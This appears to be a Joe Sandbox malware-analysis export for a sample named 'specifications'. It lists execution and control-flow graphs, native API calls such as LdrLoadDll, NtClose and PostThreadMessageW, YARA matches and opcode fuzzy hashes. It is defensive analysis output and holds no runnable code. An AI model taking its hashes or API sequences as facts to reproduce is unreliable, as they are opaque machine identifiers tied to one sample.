                                                                                                                                                                                  execution_graph 92495 424d63 92496 424d7f 92495->92496 92497 424da7 92496->92497 92498 424dbb 92496->92498 92499 42cab3 NtClose 92497->92499 92505 42cab3 92498->92505 92501 424db0 92499->92501 92502 424dc4 92508 42ec93 RtlAllocateHeap 92502->92508 92504 424dcf 92506 42cacd 92505->92506 92507 42cade NtClose 92506->92507 92507->92502 92508->92504 92649 42c073 92650 42c090 92649->92650 92653 10c2df0 LdrInitializeThunk 92650->92653 92651 42c0b8 92653->92651 92654 42fc13 92655 42fc23 92654->92655 92656 42fc29 92654->92656 92657 42ec53 RtlAllocateHeap 92656->92657 92658 42fc4f 92657->92658 92659 4250f3 92663 42510c 92659->92663 92660 42519c 92661 425154 92662 42eb73 RtlFreeHeap 92661->92662 92664 425164 92662->92664 92663->92660 92663->92661 92665 425197 92663->92665 92666 42eb73 RtlFreeHeap 92665->92666 92666->92660 92509 41e903 92510 41e929 92509->92510 92517 41ea25 92510->92517 92518 42fd43 92510->92518 92512 41e9ba 92514 41ea1c 92512->92514 92512->92517 92529 42c0c3 92512->92529 92514->92517 92524 428cf3 92514->92524 92516 41ead1 92519 42fcb3 92518->92519 92521 42fd10 92519->92521 92533 42ec53 92519->92533 92521->92512 92522 42fced 92536 42eb73 92522->92536 92525 428d58 92524->92525 92526 428d93 92525->92526 92545 418fd3 92525->92545 92526->92516 92528 428d75 92528->92516 92530 42c0e0 92529->92530 92553 10c2c0a 92530->92553 92531 42c10c 92531->92514 92539 42cde3 92533->92539 92535 42ec6e 92535->92522 92542 42ce33 92536->92542 92538 42eb8c 92538->92521 92540 42ce00 92539->92540 92541 42ce11 RtlAllocateHeap 92540->92541 92541->92535 92543 42ce50 92542->92543 92544 42ce61 RtlFreeHeap 92543->92544 92544->92538 92546 418f8e 92545->92546 92549 418fef 92545->92549 92550 42ce83 92546->92550 92548 418fbb 92548->92528 92551 42cea0 92550->92551 92552 42ceb1 ExitProcess 92551->92552 92552->92548 92554 10c2c1f LdrInitializeThunk 92553->92554 92555 10c2c11 92553->92555 92554->92531 92555->92531 92556 419283 92557 4192b3 92556->92557 92559 4192df 92557->92559 92560 41b733 92557->92560 92561 41b777 92560->92561 92562 41b798 92561->92562 92563 42cab3 NtClose 92561->92563 92562->92557 92563->92562 92564 4144a3 92565 4144bc 92564->92565 92570 417c23 92565->92570 92567 4144da 92568 414526 92567->92568 92569 414513 PostThreadMessageW 92567->92569 92569->92568 92572 417c47 92570->92572 92571 417c4e 92571->92567 92572->92571 92573 417c83 LdrLoadDll 92572->92573 92574 417c9a 92572->92574 92573->92574 92574->92567 92667 413f33 92668 413f55 92667->92668 92670 42cd43 92667->92670 92671 42cd5d 92670->92671 92674 10c2c70 LdrInitializeThunk 92671->92674 92672 42cd85 92672->92668 92674->92672 92575 10c2b60 LdrInitializeThunk 92576 401aee 92577 401b37 92576->92577 92580 4300e3 92577->92580 92583 42e723 92580->92583 92584 42e749 92583->92584 92595 407543 92584->92595 92586 42e75f 92594 401c7a 92586->92594 92598 41b543 92586->92598 92588 42e77e 92589 42ce83 ExitProcess 92588->92589 92591 42e793 92588->92591 92589->92591 92609 428603 92591->92609 92592 42e7ad 92593 42ce83 ExitProcess 92592->92593 92593->92594 92613 4168e3 92595->92613 92597 407550 92597->92586 92599 41b56f 92598->92599 92624 41b433 92599->92624 92602 41b5b4 92605 41b5d0 92602->92605 92607 42cab3 NtClose 92602->92607 92603 41b59c 92604 41b5a7 92603->92604 92606 42cab3 NtClose 92603->92606 92604->92588 92605->92588 92606->92604 92608 41b5c6 92607->92608 92608->92588 92610 428665 92609->92610 92612 428672 92610->92612 92635 418a93 92610->92635 92612->92592 92614 416900 92613->92614 92616 416919 92614->92616 92617 42d533 92614->92617 92616->92597 92619 42d54d 92617->92619 92618 42d57c 92618->92616 92619->92618 92620 42c0c3 LdrInitializeThunk 92619->92620 92621 42d5d9 92620->92621 92622 42eb73 RtlFreeHeap 92621->92622 92623 42d5f2 92622->92623 92623->92616 92625 41b529 92624->92625 92626 41b44d 92624->92626 92625->92602 92625->92603 92630 42c163 92626->92630 92629 42cab3 NtClose 92629->92625 92631 42c180 92630->92631 92634 10c35c0 LdrInitializeThunk 92631->92634 92632 41b51d 92632->92629 92634->92632 92637 418abd 92635->92637 92636 418fbb 92636->92612 92637->92636 92643 414113 92637->92643 92639 418be4 92639->92636 92640 42eb73 RtlFreeHeap 92639->92640 92641 418bfc 92640->92641 92641->92636 92642 42ce83 ExitProcess 92641->92642 92642->92636 92647 414133 92643->92647 92645 41419c 92645->92639 92646 414192 92646->92639 92647->92645 92648 41b853 RtlFreeHeap LdrInitializeThunk 92647->92648 92648->92646

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00417C23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 78 417c23-417c3f 79 417c47-417c4c 78->79 80 417c42 call 42f753 78->80 81 417c52-417c60 call 42fd53 79->81 82 417c4e-417c51 79->82 80->79 85 417c70-417c81 call 42e1f3 81->85 86 417c62-417c6d call 42fff3 81->86 91 417c83-417c97 LdrLoadDll 85->91 92 417c9a-417c9d 85->92 86->85 91->92
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                                                                                  • Instruction ID: 852cf962e2409d618e8b38b88b5540d93302ef35c3232a8832e2f214825db3c9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 090125B5E0020DA7DF10DBE5DC42FDEB378AB54308F4081A6E90897241F675EB58C795
                                                                                                                                                                                  Function 0042CAB3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 98 42cab3-42caec call 404883 call 42dd13 NtClose
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAE7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                                                                                                                  • Instruction ID: 1f7ce933016469cc88b19e90322ff2e304760343167cfa218f45b51e943dd486
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E02C362102007BC620FAAADC01FAB736CEFC5B24F00402EFA08A7242C374B90083F0
                                                                                                                                                                                  Function 010C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 116 10c2b60-10c2b6c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                                                                                                                                                                  • Instruction ID: 9f5ff3559bc62bf12fa0474e16ba2f0976d70ae8b59dd015d69280f4fee66b9d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58900265202510035105715C8414616401A97E0201B55C022E1414590DC52589916226
                                                                                                                                                                                  Function 010C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 118 10c2df0-10c2dfc LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                                                                                                                                                                  • Instruction ID: acf2c8d1e2d96960b681eea5ca5cacdb14cebf6deb33b413c6205ea3aba0a92b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD90023520151413E111715C8504707001997D0241F95C413E0824558DD6568A52A222
                                                                                                                                                                                  Function 010C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 117 10c2c70-10c2c7c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                                                                                                                                                                  • Instruction ID: 740b2f1bc921d13924461fa47c7379b5b344ed7290895cd18083d1d339512281
                                                                                                                                                                                  • Opcode Fuzzy Hash: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                                                                                                                                                                  • Instruction Fuzzy Hash: FB90023520159802E110715CC40474A001597D0301F59C412E4824658DC69589917222
                                                                                                                                                                                  Function 010C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                                                                                                                                                                  • Instruction ID: 510a34855ed59ad2da894fcede28a886b3038c54b0ce0beeaaf4a74f38f17945
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7290023560561402E100715C8514706101597D0201F65C412E0824568DC7958A5166A3
                                                                                                                                                                                  Function 0041449B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                                                                                                                  • API String ID: 1836367815-922563818
                                                                                                                                                                                  • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                                                                                                                  • Instruction ID: 2c93fbf58faf19b7145b43889d661f3b69fec038b2ff8a571458cfb118ad8616
                                                                                                                                                                                  • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A110431E4021876EF219AA1AC42FEF7F789F81754F448059FA04BB281DAB856068BE5
                                                                                                                                                                                  Function 004144A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 14 4144a3-4144b3 15 4144bc-414511 call 42f623 call 417c23 call 4047f3 call 425223 14->15 16 4144b7 call 42ec13 14->16 25 414533-414538 15->25 26 414513-414524 PostThreadMessageW 15->26 16->15 26->25 27 414526-414530 26->27 27->25
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                                                                                                                  • API String ID: 1836367815-922563818
                                                                                                                                                                                  • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                                                                                                                  • Instruction ID: 8504cfec16b6aedebdd5f95c05872cee6fb7df1a624910d20b6db10e5d894ebc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C01D671E4021876EB2196A1AD02FDF7B7C9F41B54F444059FB047B2C1EBB86A068BE5
                                                                                                                                                                                  Function 0042CE33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 28 42ce33-42ce77 call 404883 call 42dd13 RtlFreeHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE72
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID: qiA
                                                                                                                                                                                  • API String ID: 3298025750-529955485
                                                                                                                                                                                  • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                                                                                                                  • Instruction ID: 307251ad091670c87d9754cbc308c92c0932808cc59762c095a9376aec0cd4cc
                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CE06D722042547BCB14EE99DC41EDB37ACEFC9714F00442EF909A7241C770B91086B5
                                                                                                                                                                                  Function 00417CDF Relevance: 1.6, APIs: 1, Instructions: 91libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 42 417cdf-417d05 43 417d06-417d07 42->43 44 417d09-417d18 43->44 45 417d6c-417d6e 43->45 48 417d1a-417d45 44->48 49 417ccf-417cdb 44->49 46 417d70-417d81 45->46 47 417dbe-417dde call 42ba63 45->47 48->43 59 417d47-417d48 48->59 56 417c83-417c97 LdrLoadDll 49->56 57 417c9a-417c9d 49->57 56->57 59->45
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 38580999aaf99117114d273f89efd2578bdd12a5eeeabbc80364d0ff1e678916
                                                                                                                                                                                  • Instruction ID: ce8e9651cd2f2632962265eba7574f4be5e24a99500c9861ae4b74542ff918d8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 38580999aaf99117114d273f89efd2578bdd12a5eeeabbc80364d0ff1e678916
                                                                                                                                                                                  • Instruction Fuzzy Hash: F521F17254C20A9BCB019FB8EC41BF4B774CF06324F208799DCAD9B2D1E6255D4687D2
                                                                                                                                                                                  Function 00417C1C Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 60 417c1c-417c1e 61 417c20-417c4c call 42f753 60->61 62 417c58-417c60 60->62 74 417c52-417c60 call 42fd53 61->74 75 417c4e-417c51 61->75 63 417c70-417c81 call 42e1f3 62->63 64 417c62-417c6d call 42fff3 62->64 71 417c83-417c97 LdrLoadDll 63->71 72 417c9a-417c9d 63->72 64->63 71->72 74->63 74->64
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                                                                                                                  • Instruction ID: 75b5f9b12f12b08821b09bdb01f26dfbe1d2dcd7f16dd92e0ccb1d816d0901d5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4801F5B1E44109ABDF10DBA0DC42FDE77749B14308F0082BAE9189B280F635E749C791
                                                                                                                                                                                  Function 0042CDE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 93 42cde3-42ce27 call 404883 call 42dd13 RtlAllocateHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E9BA,?,?,00000000,?,0041E9BA,?,?,?), ref: 0042CE22
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                  • Opcode ID: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                                                                                                                  • Instruction ID: a4553a69e7b92f9cf539882023bc9044ba2095210ba8bf1258456adc3d3cad5f
                                                                                                                                                                                  • Opcode Fuzzy Hash: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                                                                                                                  • Instruction Fuzzy Hash: 13E039762003057BDA14EE59EC41EAB37ACEF89754F104419FE09A7241D770B9108AB5
                                                                                                                                                                                  Function 0042CE83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 103 42ce83-42cebf call 404883 call 42dd13 ExitProcess
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,07461022,?,?,07461022), ref: 0042CEBA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                  • Opcode ID: 604045ff2199d70e6ced359132bb827253c9192b951670fad5067483bfa99023
                                                                                                                                                                                  • Instruction ID: e3fc04d785b94c74c51f8313a7f33e58d860eb092d5abf4673d4ecc5aa500898
                                                                                                                                                                                  • Opcode Fuzzy Hash: 604045ff2199d70e6ced359132bb827253c9192b951670fad5067483bfa99023
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AE08C762002147BE620FB5ADC05F9B776CDFC5724F10842AFA08AB281CAB1BA0187F5
                                                                                                                                                                                  Function 00417CD6 Relevance: 1.5, APIs: 1, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 108 417cd6-417cdb 110 417c83-417c97 LdrLoadDll 108->110 111 417c9a-417c9d 108->111 110->111
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                                                                                                                  • Instruction ID: 3234135dea13a840063d5cb5e5c33c926c874a0ab7bab67cfa608a0389ac5317
                                                                                                                                                                                  • Opcode Fuzzy Hash: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01E0127564410EABEB40CFC4C881FEDB3B4EB08208F109285E91C97240E530AA46CB85
                                                                                                                                                                                  Function 010C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 112 10c2c0a-10c2c0f 113 10c2c1f-10c2c26 LdrInitializeThunk 112->113 114 10c2c11-10c2c18 112->114
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
                                                                                                                                                                                  • Instruction ID: ae3ab1fd66be5613d839faeca7cf93f8b18163841a34fc5aa7a8d6639754f940
                                                                                                                                                                                  • Opcode Fuzzy Hash: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 39B09B719015D5C5EA51E764860871F795077D0701F15C066D2430681F4738C1D1E676

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 01102349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
